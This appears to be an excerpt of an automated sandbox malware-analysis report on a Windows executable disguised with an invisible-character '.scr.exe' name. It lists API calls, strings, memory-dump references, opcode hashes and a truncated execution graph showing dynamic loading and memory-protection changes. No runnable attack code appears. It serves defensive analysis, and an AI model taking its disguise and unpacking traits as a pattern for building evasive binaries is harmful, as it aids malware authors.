                                                        • GetModuleFileNameW.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE13EF1
                                                          • Part of subcall function 00007FF73AE129E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF73AE187F2,?,?,?,?,?,?,?,?,?,?,?,00007FF73AE1101D), ref: 00007FF73AE12A14
                                                          • Part of subcall function 00007FF73AE129E0: MessageBoxW.USER32 ref: 00007FF73AE12AF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastMessageModuleName
                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                        • API String ID: 2581892565-1977442011
                                                        • Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                        • Instruction ID: 5dde69427160d7f1a42af665cbcfb0202e7b5e9a4ffce6230930577abd2d413f
                                                        • Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
                                                        • Instruction Fuzzy Hash: DC018859F6D69360FA60B720D8573F5D2516F4C7C4FC004F1D84D86292EE1CE109E720
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                        • Instruction ID: da5449148a9f34ed4caf9898ccfdbfd6b6f0e392e726e18d300cae25eb50584d
                                                        • Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
                                                        • Instruction Fuzzy Hash: 3AD16676B18A94A9F710FF74C0462ACB7B1FB84B98B844279CE5E57B89CE39D406D310
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                        • String ID:
                                                        • API String ID: 2780335769-0
                                                        • Opcode ID: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
                                                        • Instruction ID: 9046046e45b9f10776cd44e3a08e95b67232eb7ca0848f7eb309044bd64e156c
                                                        • Opcode Fuzzy Hash: 76a0635d5597b22ce5d2941ff6046abd28e8f163941117926f9164ef5776c06c
                                                        • Instruction Fuzzy Hash: 5151CE26E882459AFB10FF70C5533BCA3A1AB48B68F908579DE6D47688DF3CD4809730
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$DialogInvalidateRect
                                                        • String ID:
                                                        • API String ID: 1956198572-0
                                                        • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                        • Instruction ID: f07997df4ca2418650652616aef91567794fd44e60b77eb4520e8c267f8a8969
                                                        • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                        • Instruction Fuzzy Hash: F311E925E4816352FB58B76AF9472B99291EF88B80FC480F0DA5906BCDCD7DD4C16610
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                        • String ID: ?
                                                        • API String ID: 1286766494-1684325040
                                                        • Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                        • Instruction ID: 9b925a85e679b8c25b2d0d0712b4e84535a284960ebe3bf9634f34c4439a52fb
                                                        • Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                        • Instruction Fuzzy Hash: 2E41172AE0828266FB60BB25E44337AD7A0EF90FA4F9442B5EE5C07AD5DF3DD4419710
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE295D6
                                                          • Part of subcall function 00007FF73AE2AF0C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
                                                          • Part of subcall function 00007FF73AE2AF0C: GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C
                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF73AE1BFE5), ref: 00007FF73AE295F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
                                                        • String ID: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe
                                                        • API String ID: 3976345311-3642722051
                                                        • Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                        • Instruction ID: 3661a09d2740299081e4e64c6a38f0c9d8a255bd913fb9a633ce6f6ab6e65a11
                                                        • Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                        • Instruction Fuzzy Hash: 9B41A47AA88706AAFB54FF21A4430BCA794EF847C0F945079E94E47B85DF3DD4819320
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                        • Instruction ID: 8ca1a6bf5ca121d6e52d1427d955a35fdfdecec9968a3ab89353e848f5cee30d
                                                        • Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                        • Instruction Fuzzy Hash: 3341E326B18A45A2EB60FF65E4863A9A760FB88B90F804135EF4D87788DF3CD441D760
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory
                                                        • String ID: :
                                                        • API String ID: 1611563598-336475711
                                                        • Opcode ID: 4482f0b2aa88d097fa4b172b4d0b9d8fa621ceaf6a6e580bcf5a02da10cef38f
                                                        • Instruction ID: 4c7d896f09186eba7079ffa3ff2a339455ec342e2ea855a97ea0502a10af82a7
                                                        • Opcode Fuzzy Hash: 4482f0b2aa88d097fa4b172b4d0b9d8fa621ceaf6a6e580bcf5a02da10cef38f
                                                        • Instruction Fuzzy Hash: 87210626A88289A1FB20BB15D45727DB3B1FB84B44FC1807AD68E43284DF7CE945D761
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message$ByteCharMultiWide
                                                        • String ID: Fatal error detected
                                                        • API String ID: 1878133881-4025702859
                                                        • Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                        • Instruction ID: 248f33a5cbed526a178ee3b0700a491b6a0f61e02ba4fd9d8ab4c83db8dde205
                                                        • Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                        • Instruction Fuzzy Hash: 1B219F76668A82A1F720FB10E4536EAA364FF84784FC01175E68D47AA9DF3CD205CB20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message$ByteCharMultiWide
                                                        • String ID: Error detected
                                                        • API String ID: 1878133881-3513342764
                                                        • Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                        • Instruction ID: 0a15643f65f9c930c03f7cea75ef3520c3e7b1682362109956ecd1f28d9ecf09
                                                        • Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                        • Instruction Fuzzy Hash: 2E219176668685A1F720FB10E4936EAA364FF84784FC01175E68D47AA5DF3CD205CB10
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                        • Instruction ID: 4d9a5b5e6d9fad8b4c0c7ffb63671e5e96015faf3c60e7d7e3ae193168fb369d
                                                        • Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                        • Instruction Fuzzy Hash: BC119D36A08B4092EB60AF18F401269B7E0FB88B94F9842B5DE8D4775AEF3CC451CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                        • String ID: :
                                                        • API String ID: 2595371189-336475711
                                                        • Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                        • Instruction ID: ba0812a53fb8967e5da2d4c4e5f261cff8dc96bdf625d4f7a45247eeff43f92a
                                                        • Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                        • Instruction Fuzzy Hash: 1F018429D58206A5FB20BF60946327EE3A0EF44B06FC40079D59D466D1DF2DE644EA34

                                                        Execution Graph

                                                        Execution Coverage:1.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:1.8%
                                                        Total number of Nodes:555
                                                        Total number of Limit Nodes:91
                                                        execution_graph 56848 7ff8a871d329 56849 7ff8a871d338 56848->56849 56851 7ff8a8720d4e 56849->56851 56852 7ff8a871d411 56849->56852 56872 7ff8a8702f20 56849->56872 56855 7ff8a8720dda 56851->56855 56865 7ff8a8720e6a 56851->56865 56885 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56851->56885 56852->56851 56856 7ff8a8720f17 56852->56856 56864 7ff8a871ad10 56852->56864 56854 7ff8a8721376 56887 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56854->56887 56855->56854 56886 7ff8a8710f90 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56855->56886 56883 7ff8a86e6c20 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 56856->56883 56860 7ff8a87213c8 56863 7ff8a87213da 56860->56863 56888 7ff8a87145a0 36 API calls 56860->56888 56861 7ff8a871d374 56861->56851 56861->56852 56882 7ff8a8704230 6 API calls 56861->56882 56862 7ff8a8720f3a 56862->56865 56884 7ff8a873fb70 6 API calls 56862->56884 56867 7ff8a87213eb 56863->56867 56889 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56863->56889 56867->56865 56890 7ff8a873fb70 6 API calls 56867->56890 56874 7ff8a86fb080 56872->56874 56873 7ff8a8702f74 56873->56861 56874->56873 56891 7ff8a86e6740 56874->56891 56877 7ff8a86fb0c7 00007FF8BA251730 56878 7ff8a86fb19c 56877->56878 56879 7ff8a86fb0f2 56877->56879 56878->56861 56879->56878 56881 7ff8a86fb13f 00007FF8BA251730 56879->56881 56895 7ff8a86e62e0 56879->56895 56881->56879 56882->56852 56883->56862 56884->56865 56885->56855 56886->56854 56887->56860 56888->56863 56889->56867 56890->56865 56892 7ff8a86e6755 56891->56892 56893 7ff8a86e677b 56892->56893 56899 7ff8a86e5d05 56892->56899 56893->56877 56893->56878 56896 7ff8a86e62f9 56895->56896 56897 7ff8a86e63a0 56895->56897 56896->56897 56904 7ff8a86e5ca5 56896->56904 56897->56879 56901 7ff8a86e5d1e 56899->56901 56900 7ff8a86e5d44 56900->56893 56901->56900 56903 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56901->56903 56903->56900 56905 7ff8a86e5cb6 56904->56905 56906 7ff8a86e5cd0 56905->56906 56908 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56905->56908 56906->56897 56908->56906 56909 7ff8a871eae9 56910 7ff8a871eb07 56909->56910 56911 7ff8a8720e70 56910->56911 56914 7ff8a8720dda 56910->56914 56923 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56910->56923 56913 7ff8a8721376 56925 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56913->56925 56914->56913 56924 7ff8a8710f90 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56914->56924 56917 7ff8a87213c8 56918 7ff8a87213da 56917->56918 56926 7ff8a87145a0 36 API calls 56917->56926 56920 7ff8a87213eb 56918->56920 56927 7ff8a86e6db0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56918->56927 56920->56911 56928 7ff8a873fb70 6 API calls 56920->56928 56923->56914 56924->56913 56925->56917 56926->56918 56927->56920 56928->56911 56929 7ff8a86a7b30 56930 7ff8a86a86d1 56929->56930 56937 7ff8a86a7b48 56929->56937 56931 7ff8a86a85de LoadLibraryA 56932 7ff8a86a85f8 56931->56932 56935 7ff8a86a8617 GetProcAddress 56932->56935 56932->56937 56934 7ff8a86a8639 VirtualProtect VirtualProtect 56934->56930 56935->56932 56936 7ff8a86a862e 56935->56936 56937->56931 56937->56934 56938 7ff8a86f1490 GetSystemInfo 56939 7ff8a86f14c4 56938->56939 56940 7ff8a8701630 56941 7ff8a870167c 56940->56941 56942 7ff8a86e62e0 new[] 4 API calls 56941->56942 56947 7ff8a870170a 56942->56947 56943 7ff8a86e62e0 new[] 4 API calls 56945 7ff8a8701a06 56943->56945 56952 7ff8a87017b2 56945->56952 56958 7ff8a86f9060 56945->56958 56946 7ff8a87017cf 56949 7ff8a86e62e0 new[] 4 API calls 56947->56949 56947->56952 56953 7ff8a87017a2 56947->56953 56949->56953 56950 7ff8a8701a61 56954 7ff8a8701ae2 56950->56954 56956 7ff8a8701bd1 56950->56956 56975 7ff8a86edc50 56950->56975 56985 7ff8a880abc0 56952->56985 56953->56943 56953->56952 56953->56956 56954->56956 56992 7ff8a86f85d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56954->56992 56956->56952 56993 7ff8a86f87b0 56956->56993 56959 7ff8a86f9244 56958->56959 56960 7ff8a86f90f1 56958->56960 56964 7ff8a86e62e0 new[] 4 API calls 56959->56964 56967 7ff8a86f9125 56959->56967 56960->56959 56962 7ff8a86f910a 56960->56962 56961 7ff8a86e62e0 new[] 4 API calls 56963 7ff8a86f9196 56961->56963 56966 7ff8a86e62e0 new[] 4 API calls 56962->56966 56965 7ff8a86f91a2 00007FF8BA251730 56963->56965 56973 7ff8a86f9383 56963->56973 56970 7ff8a86f927c 56964->56970 56969 7ff8a86f920c 56965->56969 56966->56967 56967->56961 56967->56973 56972 7ff8a86f9518 56969->56972 57006 7ff8a86f0250 56969->57006 56970->56967 56970->56970 56970->56973 57020 7ff8a87a25d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56970->57020 56972->56973 57021 7ff8a86f85d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56972->57021 56973->56950 56984 7ff8a86edc7d 56975->56984 56976 7ff8a86edcf4 ReadFile 56978 7ff8a86edd8a 56976->56978 56976->56984 56977 7ff8a86edc94 56977->56954 56979 7ff8a86eddba 56978->56979 57034 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56978->57034 56979->56977 56981 7ff8a86eddc9 00007FF8BA251730 56979->56981 56981->56977 56982 7ff8a86edd64 57033 7ff8a86eda80 9 API calls 56982->57033 56984->56976 56984->56977 56984->56978 56984->56982 56986 7ff8a880abc9 56985->56986 56987 7ff8a880abd4 56986->56987 56988 7ff8a880ac14 IsProcessorFeaturePresent 56986->56988 56987->56946 56989 7ff8a880ac2c 56988->56989 57035 7ff8a880ae08 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56989->57035 56991 7ff8a880ac3f 56991->56946 56992->56956 56995 7ff8a86f87e3 56993->56995 57036 7ff8a86fd460 56995->57036 56996 7ff8a86f88ac 56996->56996 57042 7ff8a86f40e0 56996->57042 56998 7ff8a86f8988 57046 7ff8a86f6a40 56998->57046 57000 7ff8a86f8972 57050 7ff8a86faf90 22 API calls 57000->57050 57001 7ff8a86f8998 57001->56998 57051 7ff8a86f6ca0 00007FF8BA251730 00007FF8BA251730 57001->57051 57005 7ff8a86f89b3 57005->56952 57012 7ff8a86f02a1 57006->57012 57009 7ff8a880abc0 4 API calls 57010 7ff8a86f08c7 57009->57010 57010->56972 57011 7ff8a86f0628 57011->57009 57012->57011 57013 7ff8a86f0470 CreateFileW 57012->57013 57016 7ff8a86f06f5 57012->57016 57022 7ff8a86ed2c0 57012->57022 57028 7ff8a86efc70 11 API calls new[] 57012->57028 57029 7ff8a86f0aa0 10 API calls 57012->57029 57030 7ff8a86e94b0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57012->57030 57013->57012 57031 7ff8a86eda80 9 API calls 57016->57031 57018 7ff8a86f0720 57032 7ff8a87a25d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57018->57032 57020->56967 57021->56973 57023 7ff8a86ed2fe 57022->57023 57024 7ff8a86e62e0 new[] 4 API calls 57023->57024 57027 7ff8a86ed347 57023->57027 57025 7ff8a86ed313 57024->57025 57026 7ff8a86ed31b 00007FF8BA251730 57025->57026 57025->57027 57026->57027 57027->57012 57028->57012 57029->57012 57030->57012 57031->57018 57032->57011 57033->56977 57034->56979 57035->56991 57037 7ff8a86fd48f 57036->57037 57039 7ff8a86fd541 57036->57039 57037->57039 57052 7ff8a86ff040 10 API calls 57037->57052 57039->56996 57040 7ff8a86fd4fc 57040->57039 57053 7ff8a86fd3d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 57040->57053 57043 7ff8a86f41e1 57042->57043 57045 7ff8a86f40fc 57042->57045 57043->56998 57043->57000 57043->57001 57044 7ff8a86f41ce 00007FF8BA251730 57044->57043 57045->57043 57045->57044 57049 7ff8a86f6a56 57046->57049 57047 7ff8a86f40e0 00007FF8BA251730 57048 7ff8a86f6b3e 57047->57048 57048->57005 57049->57047 57049->57048 57050->56998 57051->56998 57052->57040 57053->57039 57054 7ff8a873f610 57055 7ff8a873f63c 57054->57055 57058 7ff8a873f641 57054->57058 57067 7ff8a87628a0 57055->57067 57057 7ff8a873f73a 57059 7ff8a873f780 57057->57059 57060 7ff8a873f796 57057->57060 57064 7ff8a873f73e 57057->57064 57058->57057 57058->57064 57066 7ff8a873f727 57058->57066 57071 7ff8a877b4d0 5 API calls new[] 57058->57071 57073 